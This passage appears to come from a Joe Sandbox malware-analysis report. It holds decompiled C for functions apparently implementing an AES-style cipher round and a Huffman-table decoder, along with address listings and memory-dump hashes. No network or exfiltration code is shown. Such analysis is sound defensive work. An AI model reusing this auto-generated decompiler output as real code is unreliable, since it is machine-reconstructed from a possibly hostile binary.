							 *(_t431 + 0x18) = _t374;
							L9:
							_t252 =  *(_t425 + 0x28) ^  *(_t431 + 0x10);
							 *(_t431 + 0x20) = _t252;
							 *(_t431 + 0x4c) = _t252;
							_t376 =  *(_t425 + 0x34) ^  *(_t431 + 0x18);
							 *(_t431 + 0x3c) =  *((intOrPtr*)((_t252 & 0x000000ff) + 0x4150c8));
							_t399 =  *(_t425 + 0x30) ^  *(_t431 + 0x14);
							_t348 =  *(_t425 + 0x2c) ^  *(_t431 + 0x1c);
							 *((char*)(_t431 + 0x3d)) =  *((intOrPtr*)((_t376 >> 0x00000008 & 0x000000ff) + 0x4150c8));
							_t415 =  *(_t431 + 0x20);
							 *(_t431 + 0x54) = _t399;
							 *(_t431 + 0x50) = _t348;
							 *((char*)(_t431 + 0x3e)) =  *((intOrPtr*)((_t399 >> 0x00000010 & 0x000000ff) + 0x4150c8));
							 *(_t431 + 0x58) = _t376;
							 *((char*)(_t431 + 0x3f)) =  *((intOrPtr*)((_t348 >> 0x18) + 0x4150c8));
							 *(_t431 + 0x40) =  *((intOrPtr*)((_t348 & 0x000000ff) + 0x4150c8));
							 *((char*)(_t431 + 0x41)) =  *((intOrPtr*)((_t415 >> 0x00000008 & 0x000000ff) + 0x4150c8));
							 *((char*)(_t431 + 0x42)) =  *((intOrPtr*)((_t376 >> 0x00000010 & 0x000000ff) + 0x4150c8));
							 *((char*)(_t431 + 0x43)) =  *((intOrPtr*)((_t399 >> 0x18) + 0x4150c8));
							 *(_t431 + 0x44) =  *((intOrPtr*)((_t399 & 0x000000ff) + 0x4150c8));
							 *((char*)(_t431 + 0x45)) =  *((intOrPtr*)((_t348 >> 0x00000008 & 0x000000ff) + 0x4150c8));
							_t416 = _t415 >> 0x18;
							 *((char*)(_t431 + 0x46)) =  *((intOrPtr*)((_t415 >> 0x00000010 & 0x000000ff) + 0x4150c8));
							 *((char*)(_t431 + 0x47)) =  *((intOrPtr*)((_t376 >> 0x18) + 0x4150c8));
							 *(_t431 + 0x48) =  *((intOrPtr*)((_t376 & 0x000000ff) + 0x4150c8));
							_t402 =  *(_t425 + 0x18) ^  *(_t431 + 0x3c);
							 *((char*)(_t431 + 0x49)) =  *((intOrPtr*)((_t399 >> 0x00000008 & 0x000000ff) + 0x4150c8));
							 *((char*)(_t431 + 0x4a)) =  *((intOrPtr*)((_t348 >> 0x00000010 & 0x000000ff) + 0x4150c8));
							_t186 = _t416 + 0x4150c8; // 0x30d56a09
							 *((char*)(_t431 + 0x4b)) =  *_t186;
							_t300 =  *(_t425 + 0x24) ^  *(_t431 + 0x48);
							_t418 =  *(_t425 + 0x1c) ^  *(_t431 + 0x40);
							_t351 =  *(_t425 + 0x20) ^  *(_t431 + 0x44);
							 *(_t431 + 0x20) = _t300;
							if( *((char*)(_t425 + 1)) != 0) {
								_t402 = _t402 ^  *(_t431 + 0x5c);
								_t418 = _t418 ^  *(_t431 + 0x60);
								_t351 = _t351 ^  *(_t431 + 0x64);
								 *(_t431 + 0x20) = _t300 ^  *(_t431 + 0x68);
							}
							 *(_t431 + 0x5c) =  *( *(_t431 + 0x30));
							_t303 =  *(_t431 + 0x24);
							 *(_t431 + 0x60) =  *(_t303 - 4);
							 *(_t431 + 0x64) =  *_t303;
							 *(_t431 + 0x68) = _t303[1];
							_t380 =  *(_t431 + 0x28);
							 *(_t431 + 0x24) =  &(_t303[4]);
							 *(_t380 - 8) = _t402;
							_t380[1] =  *(_t431 + 0x20);
							_t394 =  *((intOrPtr*)(_t431 + 0x34));
							 *(_t380 - 4) = _t418;
							 *_t380 = _t351;
							_t357 =  &(_t380[4]);
							_t408 = _t408 - 1;
							 *(_t431 + 0x28) = _t357;
							 *(_t431 + 0x74) = _t408;
						} while (_t408 != 0);
						goto L13;
					}
					return E003DEE7A( *((intOrPtr*)(_t430 + 0x70)), _t408,  *((intOrPtr*)(_t430 + 0x70)));
				}
				return _t220;
			}










































                0x003de9bc
                0x003de9c0
                0x003de9c2
                0x003de9c8
                0x003de9ce
                0x003de9d5
                0x003de9d9
                0x003de9f4
                0x003de9fd
                0x003dea02
                0x003dea07
                0x003dee5f
                0x00000000
                0x003dee6f
                0x003dea0d
                0x003dea16
                0x003dea1a
                0x003dea20
                0x003dea23
                0x003dea27
                0x003dea2a
                0x003dea2e
                0x003dea2e
                0x003dea35
                0x003dea48
                0x003dea4d
                0x003dea73
                0x003dea77
                0x003dea82
                0x003dea89
                0x003dea8d
                0x003dea94
                0x003deaba
                0x003deac6
                0x003deaca
                0x003dead8
                0x003deae3
                0x003deafa
                0x003deb06
                0x003deb0a
                0x003deb21
                0x003deb36
                0x003deb3d
                0x003deb40
                0x003deb44
                0x003deb4b
                0x00000000
                0x00000000
                0x003deb51
                0x003deb5b
                0x003deb5d
                0x003deb62
                0x003deb66
                0x003deb6a
                0x003deb71
                0x003deb75
                0x003deb81
                0x003deb85
                0x003deb87
                0x003debbc
                0x003debdc
                0x003debf6
                0x003dec19
                0x003dec36
                0x003dec3d
                0x003dec41
                0x003dec70
                0x003dec73
                0x003dec77
                0x003dec7e
                0x003dec7e
                0x003dec83
                0x003dec83
                0x003dec8d
                0x003dec91
                0x003dec95
                0x003dec99
                0x003dec9d
                0x003deca1
                0x003deca4
                0x003deca8
                0x003decac
                0x003decb6
                0x003decc3
                0x003deccf
                0x003decd6
                0x003dece0
                0x003decec
                0x003decf0
                0x003decf4
                0x003decfe
                0x003ded07
                0x003ded11
                0x003ded1e
                0x003ded30
                0x003ded42
                0x003ded51
                0x003ded61
                0x003ded76
                0x003ded82
                0x003ded8b
                0x003ded9a
                0x003deda7
                0x003dedb1
                0x003dedbb
                0x003dedc8
                0x003dedcc
                0x003dedd2
                0x003deddf
                0x003dede3
                0x003dede7
                0x003dedef
                0x003dedf3
                0x003dedf5
                0x003dedf9
                0x003dedfd
                0x003dee05
                0x003dee05
                0x003dee0f
                0x003dee13
                0x003dee1a
                0x003dee20
                0x003dee2a
                0x003dee2e
                0x003dee32
                0x003dee36
                0x003dee3d
                0x003dee40
                0x003dee44
                0x003dee47
                0x003dee49
                0x003dee4c
                0x003dee4f
                0x003dee53
                0x003dee53
                0x00000000
                0x003dee5e
                0x00000000
                0x003de9e4
                0x003dee77

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7785a15e5689081a76bc763e5a564905f81c618bdaf6acc0837ec8dfb2c56276
                • Instruction ID: 71d063ddc30f8762997527fb2169d5f7ad6aef682b7fb85fc1eb5cf842ee5557
                • Opcode Fuzzy Hash: 7785a15e5689081a76bc763e5a564905f81c618bdaf6acc0837ec8dfb2c56276
                • Instruction Fuzzy Hash: E8E16D755083948FC304CF69D8904AABFF0AFDA310F46496EF9C497352C235EA19DB96
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E4088 Relevance: .3, Instructions: 270COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 85%
                			E003E4088(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t87;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				void* _t99;
				void* _t101;
				void* _t121;
				signed int _t130;
				signed int _t139;
				signed int _t140;
				signed int _t149;
				signed int _t151;
				void* _t153;
				signed int _t156;
				signed int _t157;
				intOrPtr* _t158;
				intOrPtr* _t167;
				signed int _t170;
				void* _t171;
				signed int _t174;
				void* _t179;
				unsigned int _t181;
				void* _t184;
				signed int _t185;
				intOrPtr* _t186;
				void* _t187;
				signed int _t188;
				signed int _t189;
				intOrPtr* _t190;
				signed int _t193;
				signed int _t198;
				void* _t201;

				_t179 = __edx;
				_t187 = __ecx;
				_t186 = __ecx + 4;
				if( *_t186 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19 || E003E4DC4(__ecx) != 0) {
					E003DA881(_t186,  ~( *(_t187 + 8)) & 0x00000007);
					_t82 = E003DA898(_t186);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t139 = 0;
						 *((intOrPtr*)(_t187 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t187 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t187 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E003EFFF0(_t186, _t187 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E003DA881(_t186, 2);
						do {
							 *(_t201 + 0x14) = E003DA898(_t186) >> 0xc;
							E003DA881(_t186, 4);
							_t87 =  *(_t201 + 0x10);
							__eflags = _t87 - 0xf;
							if(_t87 != 0xf) {
								 *(_t201 + _t139 + 0x14) = _t87;
								goto L15;
							}
							_t188 = E003DA898(_t186) >> 0x0000000c & 0x000000ff;
							E003DA881(_t186, 4);
							__eflags = _t188;
							if(_t188 != 0) {
								_t189 = _t188 + 2;
								__eflags = _t189;
								while(1) {
									_t189 = _t189 - 1;
									__eflags = _t139 - 0x14;
									if(_t139 >= 0x14) {
										break;
									}
									 *(_t201 + _t139 + 0x14) = 0;
									_t139 = _t139 + 1;
									__eflags = _t189;
									if(_t189 != 0) {
										continue;
									}
									break;
								}
								_t139 = _t139 - 1;
								goto L15;
							}
							 *(_t201 + _t139 + 0x14) = 0xf;
							L15:
							_t139 = _t139 + 1;
							__eflags = _t139 - 0x14;
						} while (_t139 < 0x14);
						_push(0x14);
						_t190 = _t187 + 0x3c50;
						_push(_t190);
						_push(_t201 + 0x1c);
						E003E3797();
						_t140 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84)) - 5;
							if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84)) - 5) {
								L19:
								_t92 = E003DA89D(_t186);
								_t93 =  *(_t190 + 0x84);
								_t181 = _t92 & 0x0000fffe;
								__eflags = _t181 -  *((intOrPtr*)(_t190 + 4 + _t93 * 4));
								if(_t181 >=  *((intOrPtr*)(_t190 + 4 + _t93 * 4))) {
									_t149 = 0xf;
									_t94 = _t93 + 1;
									 *(_t201 + 0x10) = _t149;
									__eflags = _t94 - _t149;
									if(_t94 >= _t149) {
										L27:
										_t151 =  *(_t186 + 4) +  *(_t201 + 0x10);
										 *_t186 =  *_t186 + (_t151 >> 3);
										_t97 =  *(_t201 + 0x10);
										 *(_t186 + 4) = _t151 & 0x00000007;
										_t153 = 0x10;
										_t156 =  *((intOrPtr*)(_t190 + 0x44 + _t97 * 4)) + (_t181 -  *((intOrPtr*)(_t190 + _t97 * 4)) >> _t153 - _t97);
										__eflags = _t156 -  *_t190;
										asm("sbb eax, eax");
										_t98 = _t97 & _t156;
										__eflags = _t98;
										_t157 =  *(_t190 + 0xc88 + _t98 * 2) & 0x0000ffff;
										L28:
										_t184 = 0x10;
										__eflags = _t157 - _t184;
										if(_t157 >= _t184) {
											_t99 = 0x12;
											__eflags = _t157 - _t99;
											if(__eflags >= 0) {
												_t158 = _t186;
												if(__eflags != 0) {
													_t193 = (E003DA898(_t158) >> 9) + 0xb;
													__eflags = _t193;
													_push(7);
												} else {
													_t193 = (E003DA898(_t158) >> 0xd) + 3;
													_push(3);
												}
												_pop(_t101);
												E003DA881(_t186, _t101);
												while(1) {
													_t193 = _t193 - 1;
													__eflags = _t140 - 0x194;
													if(_t140 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t140 + 0x28) = 0;
													_t140 = _t140 + 1;
													__eflags = _t193;
													if(_t193 != 0) {
														continue;
													}
													L44:
													_t190 = _t187 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t157 - _t184;
											_t167 = _t186;
											if(_t157 != _t184) {
												_t198 = (E003DA898(_t167) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E003DA898(_t167) >> 0xd) + 3;
												_push(3);
											}
											_pop(_t121);
											E003DA881(_t186, _t121);
											__eflags = _t140;
											if(_t140 == 0) {
												goto L47;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t140 - 0x194;
													if(_t140 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t201 + _t140 + 0x27));
													_t140 = _t140 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t140 + 0x28) =  *((intOrPtr*)(_t140 + _t187 + 0xe4c8)) + _t157 & 0x0000000f;
										_t140 = _t140 + 1;
										goto L45;
									}
									_t170 = 4 + _t94 * 4 + _t190;
									__eflags = _t170;
									while(1) {
										__eflags = _t181 -  *_t170;
										if(_t181 <  *_t170) {
											break;
										}
										_t94 = _t94 + 1;
										_t170 = _t170 + 4;
										__eflags = _t94 - 0xf;
										if(_t94 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t94;
									goto L27;
								}
								_t171 = 0x10;
								_t185 = _t181 >> _t171 - _t93;
								_t174 = ( *(_t185 + _t190 + 0x88) & 0x000000ff) +  *(_t186 + 4);
								 *_t186 =  *_t186 + (_t174 >> 3);
								 *(_t186 + 4) = _t174 & 0x00000007;
								_t157 =  *(_t190 + 0x488 + _t185 * 2) & 0x0000ffff;
								goto L28;
							}
							_t130 = E003E4DC4(_t187);
							__eflags = _t130;
							if(_t130 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t140 - 0x194;
						} while (_t140 < 0x194);
						L46:
						 *((char*)(_t187 + 0xe661)) = 1;
						__eflags =  *_t186 -  *((intOrPtr*)(_t187 + 0x84));
						if( *_t186 <=  *((intOrPtr*)(_t187 + 0x84))) {
							_push(0x12b);
							_push(_t187 + 0xa0);
							_push(_t201 + 0x30);
							E003E3797();
							_push(0x3c);
							_push(_t187 + 0xf8c);
							_push(_t201 + 0x15b);
							E003E3797();
							_push(0x11);
							_push(_t187 + 0x1e78);
							_push(_t201 + 0x197);
							E003E3797();
							_push(0x1c);
							_push(_t187 + 0x2d64);
							_push(_t201 + 0x1a8);
							E003E3797();
							E003F0320(_t187 + 0xe4c8, _t201 + 0x2c, 0x194);
							return 1;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t187 + 0xe65c)) = 1;
					return E003E2F75(_t179, _t205, _t187, _t187 + 0xe4c4);
				} else {
					L47:
					return 0;
				}
			}







































                0x003e4088
                0x003e4091
                0x003e409a
                0x003e40a2
                0x003e40bc
                0x003e40c3
                0x003e40c8
                0x003e40cd
                0x003e40f1
                0x003e40f3
                0x003e40f9
                0x003e40ff
                0x003e4105
                0x003e410a
                0x003e4119
                0x003e411e
                0x003e411e
                0x003e4125
                0x003e412a
                0x003e4138
                0x003e413c
                0x003e4141
                0x003e4145
                0x003e4147
                0x003e4180
                0x00000000
                0x003e4180
                0x003e4157
                0x003e415a
                0x003e415f
                0x003e4161
                0x003e416a
                0x003e416a
                0x003e416d
                0x003e416d
                0x003e416e
                0x003e4171
                0x00000000
                0x00000000
                0x003e4173
                0x003e4178
                0x003e4179
                0x003e417b
                0x00000000
                0x00000000
                0x00000000
                0x003e417b
                0x003e417d
                0x00000000
                0x003e417d
                0x003e4163
                0x003e4184
                0x003e4184
                0x003e4185
                0x003e4185
                0x003e418a
                0x003e418c
                0x003e4194
                0x003e4199
                0x003e419a
                0x003e419f
                0x003e419f
                0x003e41a1
                0x003e41aa
                0x003e41ac
                0x003e41bd
                0x003e41bf
                0x003e41c6
                0x003e41cc
                0x003e41d2
                0x003e41d6
                0x003e4203
                0x003e4204
                0x003e4205
                0x003e4209
                0x003e420b
                0x003e4229
                0x003e422c
                0x003e4238
                0x003e423a
                0x003e423e
                0x003e4243
                0x003e4250
                0x003e4252
                0x003e4255
                0x003e4257
                0x003e4257
                0x003e4259
                0x003e4261
                0x003e4263
                0x003e4264
                0x003e4267
                0x003e4280
                0x003e4281
                0x003e4284
                0x003e42d2
                0x003e42d4
                0x003e42f1
                0x003e42f1
                0x003e42f4
                0x003e42d6
                0x003e42e0
                0x003e42e3
                0x003e42e3
                0x003e42f6
                0x003e42fa
                0x003e42ff
                0x003e42ff
                0x003e4300
                0x003e4306
                0x00000000
                0x00000000
                0x003e4308
                0x003e430d
                0x003e430e
                0x003e4310
                0x00000000
                0x00000000
                0x003e4312
                0x003e4312
                0x00000000
                0x003e4312
                0x00000000
                0x003e42ff
                0x003e4286
                0x003e4289
                0x003e428b
                0x003e42a8
                0x003e42a8
                0x003e42ab
                0x003e428d
                0x003e4297
                0x003e429a
                0x003e429a
                0x003e42ad
                0x003e42b1
                0x003e42b6
                0x003e42b8
                0x00000000
                0x003e42ba
                0x003e42ba
                0x003e42ba
                0x003e42bb
                0x003e42c1
                0x00000000
                0x00000000
                0x003e42c7
                0x003e42cb
                0x003e42cc
                0x003e42ce
                0x00000000
                0x00000000
                0x00000000
                0x003e42d0
                0x00000000
                0x003e42ba
                0x003e42b8
                0x003e4274
                0x003e4278
                0x00000000
                0x003e4278
                0x003e4214
                0x003e4214
                0x003e4216
                0x003e4216
                0x003e4218
                0x00000000
                0x00000000
                0x003e421a
                0x003e421b
                0x003e421e
                0x003e4221
                0x00000000
                0x00000000
                0x00000000
                0x003e4223
                0x003e4225
                0x00000000
                0x003e4225
                0x003e41da
                0x003e41dd
                0x003e41e7
                0x003e41ef
                0x003e41f4
                0x003e41f7
                0x00000000
                0x003e41f7
                0x003e41b0
                0x003e41b5
                0x003e41b7
                0x00000000
                0x00000000
                0x00000000
                0x003e4318
                0x003e4318
                0x003e4318
                0x003e4324
                0x003e4326
                0x003e432d
                0x003e4333
                0x003e4339
                0x003e4346
                0x003e434b
                0x003e434c
                0x003e4351
                0x003e435b
                0x003e4363
                0x003e4364
                0x003e4369
                0x003e4373
                0x003e437b
                0x003e437c
                0x003e4381
                0x003e438b
                0x003e4393
                0x003e4394
                0x003e43aa
                0x00000000
                0x003e43b2
                0x00000000
                0x003e4333
                0x003e40d5
                0x00000000
                0x003e4335
                0x003e4335
                0x00000000
                0x003e4335

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                • Instruction ID: c9f4cef8d0a33664ab31349043894c44ee254b69209df7a83654a991c8d94cf4
                • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                • Instruction Fuzzy Hash: B5918BB12007998BCB26EE65E894BBA77C4EB58300F100B2DFA968B3C2DA349545D352
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E43BF Relevance: .2, Instructions: 243COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 86%
                			E003E43BF(void* __ecx) {
				signed int _t70;
				signed int _t71;
				signed int _t72;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				void* _t79;
				char _t90;
				signed int _t94;
				void* _t97;
				signed int _t108;
				unsigned int _t112;
				intOrPtr* _t114;
				signed int _t117;
				intOrPtr _t118;
				signed int _t124;
				signed int _t127;
				signed int _t128;
				signed int _t134;
				signed int _t136;
				void* _t138;
				signed int _t141;
				void* _t142;
				intOrPtr* _t143;
				void* _t147;
				intOrPtr* _t153;
				intOrPtr* _t156;
				void* _t157;
				signed int _t160;
				unsigned int _t165;
				void* _t168;
				signed int _t169;
				signed int _t171;
				signed int _t172;
				intOrPtr* _t175;
				void* _t177;
				void* _t178;

				_t177 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t178 + 8)) + 0x11)) != 0) {
					_t175 =  *((intOrPtr*)(_t178 + 0x1dc));
					__eflags =  *((char*)(_t175 + 8));
					if( *((char*)(_t175 + 8)) != 0) {
						L5:
						_t171 = 0;
						__eflags = 0;
						do {
							_t112 = E003DA898(_t175) >> 0xc;
							E003DA881(_t175, 4);
							__eflags = _t112 - 0xf;
							if(_t112 != 0xf) {
								 *(_t178 + _t171 + 0x18) = _t112;
								goto L14;
							}
							_t127 = E003DA898(_t175) >> 0x0000000c & 0x000000ff;
							E003DA881(_t175, 4);
							__eflags = _t127;
							if(_t127 != 0) {
								_t128 = _t127 + 2;
								__eflags = _t128;
								while(1) {
									_t128 = _t128 - 1;
									__eflags = _t171 - 0x14;
									if(_t171 >= 0x14) {
										break;
									}
									 *(_t178 + _t171 + 0x18) = 0;
									_t171 = _t171 + 1;
									__eflags = _t128;
									if(_t128 != 0) {
										continue;
									}
									break;
								}
								_t171 = _t171 - 1;
								goto L14;
							}
							 *(_t178 + _t171 + 0x18) = 0xf;
							L14:
							_t171 = _t171 + 1;
							__eflags = _t171 - 0x14;
						} while (_t171 < 0x14);
						_push(0x14);
						_t114 =  *((intOrPtr*)(_t178 + 0x1e8)) + 0x3bb0;
						_push(_t114);
						_push(_t178 + 0x18);
						 *((intOrPtr*)(_t178 + 0x20)) = _t114;
						E003E3797();
						_t172 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t175 + 8));
							if( *((char*)(_t175 + 8)) != 0) {
								L19:
								_t70 = E003DA89D(_t175);
								_t71 =  *(_t114 + 0x84);
								_t165 = _t70 & 0x0000fffe;
								__eflags = _t165 -  *((intOrPtr*)(_t114 + 4 + _t71 * 4));
								if(_t165 >=  *((intOrPtr*)(_t114 + 4 + _t71 * 4))) {
									_t134 = 0xf;
									_t72 = _t71 + 1;
									 *(_t178 + 0x10) = _t134;
									__eflags = _t72 - _t134;
									if(_t72 >= _t134) {
										L27:
										_t136 =  *(_t175 + 4) +  *(_t178 + 0x10);
										 *_t175 =  *_t175 + (_t136 >> 3);
										_t75 =  *(_t178 + 0x10);
										 *(_t175 + 4) = _t136 & 0x00000007;
										_t138 = 0x10;
										_t141 =  *((intOrPtr*)(_t114 + 0x44 + _t75 * 4)) + (_t165 -  *((intOrPtr*)(_t114 + _t75 * 4)) >> _t138 - _t75);
										__eflags = _t141 -  *_t114;
										asm("sbb eax, eax");
										_t76 = _t75 & _t141;
										__eflags = _t76;
										_t77 =  *(_t114 + 0xc88 + _t76 * 2) & 0x0000ffff;
										L28:
										_t142 = 0x10;
										__eflags = _t77 - _t142;
										if(_t77 >= _t142) {
											_t168 = 0x12;
											__eflags = _t77 - _t168;
											if(__eflags >= 0) {
												_t143 = _t175;
												if(__eflags != 0) {
													_t117 = (E003DA898(_t143) >> 9) + 0xb;
													__eflags = _t117;
													_push(7);
												} else {
													_t117 = (E003DA898(_t143) >> 0xd) + 3;
													_push(3);
												}
												_pop(_t79);
												E003DA881(_t175, _t79);
												while(1) {
													_t117 = _t117 - 1;
													__eflags = _t172 - 0x1ae;
													if(_t172 >= 0x1ae) {
														goto L46;
													}
													 *(_t178 + _t172 + 0x2c) = 0;
													_t172 = _t172 + 1;
													__eflags = _t117;
													if(_t117 != 0) {
														continue;
													}
													L44:
													_t114 =  *((intOrPtr*)(_t178 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t77 - _t142;
											_t153 = _t175;
											if(_t77 != _t142) {
												_t124 = (E003DA898(_t153) >> 9) + 0xb;
												__eflags = _t124;
												_push(7);
											} else {
												_t124 = (E003DA898(_t153) >> 0xd) + 3;
												_push(3);
											}
											_pop(_t97);
											E003DA881(_t175, _t97);
											__eflags = _t172;
											if(_t172 == 0) {
												L48:
												_t90 = 0;
												L50:
												return _t90;
											} else {
												while(1) {
													_t124 = _t124 - 1;
													__eflags = _t172 - 0x1ae;
													if(_t172 >= 0x1ae) {
														goto L46;
													}
													 *(_t178 + _t172 + 0x2c) =  *((intOrPtr*)(_t178 + _t172 + 0x2b));
													_t172 = _t172 + 1;
													__eflags = _t124;
													if(_t124 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t178 + _t172 + 0x2c) = _t77;
										_t172 = _t172 + 1;
										goto L45;
									}
									_t156 = _t114 + (_t72 + 1) * 4;
									while(1) {
										__eflags = _t165 -  *_t156;
										if(_t165 <  *_t156) {
											break;
										}
										_t72 = _t72 + 1;
										_t156 = _t156 + 4;
										__eflags = _t72 - 0xf;
										if(_t72 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t178 + 0x10) = _t72;
									goto L27;
								}
								_t157 = 0x10;
								_t169 = _t165 >> _t157 - _t71;
								_t160 = ( *(_t169 + _t114 + 0x88) & 0x000000ff) +  *(_t175 + 4);
								 *_t175 =  *_t175 + (_t160 >> 3);
								 *(_t175 + 4) = _t160 & 0x00000007;
								_t77 =  *(_t114 + 0x488 + _t169 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84)) - 5;
							if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E003E4E52(_t177);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t172 - 0x1ae;
						} while (_t172 < 0x1ae);
						L46:
						 *((char*)(_t177 + 0xe662)) = 1;
						__eflags =  *((char*)(_t175 + 8));
						if( *((char*)(_t175 + 8)) != 0) {
							L49:
							_t118 =  *((intOrPtr*)(_t178 + 0x1e8));
							_push(0x132);
							_push(_t118);
							_push(_t178 + 0x2c);
							E003E3797();
							_push(0x40);
							_push(_t118 + 0xeec);
							_push(_t178 + 0x166);
							E003E3797();
							_t147 = 0x10;
							_push(_t147);
							_push(_t118 + 0x1dd8);
							_push(_t178 + 0x1a6);
							E003E3797();
							_push(0x2c);
							_push(_t118 + 0x2cc4);
							_push(_t178 + 0x1b6);
							E003E3797();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t175 -  *((intOrPtr*)(_t177 + 0x84));
						if( *_t175 <=  *((intOrPtr*)(_t177 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t175 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t175 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t108 = E003E4E52(__ecx);
					__eflags = _t108;
					if(_t108 == 0) {
						goto L48;
					}
					goto L5;
				}
				return 1;
			}








































                0x003e43ce
                0x003e43d0
                0x003e43db
                0x003e43e3
                0x003e43e7
                0x003e4403
                0x003e4403
                0x003e4403
                0x003e4405
                0x003e4412
                0x003e4415
                0x003e441a
                0x003e441d
                0x003e4456
                0x00000000
                0x003e4456
                0x003e442d
                0x003e4430
                0x003e4435
                0x003e4437
                0x003e4440
                0x003e4440
                0x003e4443
                0x003e4443
                0x003e4444
                0x003e4447
                0x00000000
                0x00000000
                0x003e4449
                0x003e444e
                0x003e444f
                0x003e4451
                0x00000000
                0x00000000
                0x00000000
                0x003e4451
                0x003e4453
                0x00000000
                0x003e4453
                0x003e4439
                0x003e445a
                0x003e445a
                0x003e445b
                0x003e445b
                0x003e446b
                0x003e446d
                0x003e4475
                0x003e4476
                0x003e4477
                0x003e447b
                0x003e4480
                0x003e4480
                0x003e4482
                0x003e4482
                0x003e4486
                0x003e44a4
                0x003e44a6
                0x003e44ad
                0x003e44b3
                0x003e44b9
                0x003e44bd
                0x003e44ea
                0x003e44eb
                0x003e44ec
                0x003e44f0
                0x003e44f2
                0x003e450d
                0x003e4510
                0x003e451c
                0x003e451e
                0x003e4522
                0x003e4527
                0x003e4533
                0x003e4535
                0x003e4537
                0x003e4539
                0x003e4539
                0x003e453b
                0x003e4543
                0x003e4545
                0x003e4546
                0x003e4549
                0x003e4557
                0x003e4558
                0x003e455b
                0x003e45a9
                0x003e45ab
                0x003e45c8
                0x003e45c8
                0x003e45cb
                0x003e45ad
                0x003e45b7
                0x003e45ba
                0x003e45ba
                0x003e45cd
                0x003e45d1
                0x003e45d6
                0x003e45d6
                0x003e45d7
                0x003e45dd
                0x00000000
                0x00000000
                0x003e45df
                0x003e45e4
                0x003e45e5
                0x003e45e7
                0x00000000
                0x00000000
                0x003e45e9
                0x003e45e9
                0x00000000
                0x003e45e9
                0x00000000
                0x003e45d6
                0x003e455d
                0x003e4560
                0x003e4562
                0x003e457f
                0x003e457f
                0x003e4582
                0x003e4564
                0x003e456e
                0x003e4571
                0x003e4571
                0x003e4584
                0x003e4588
                0x003e458d
                0x003e458f
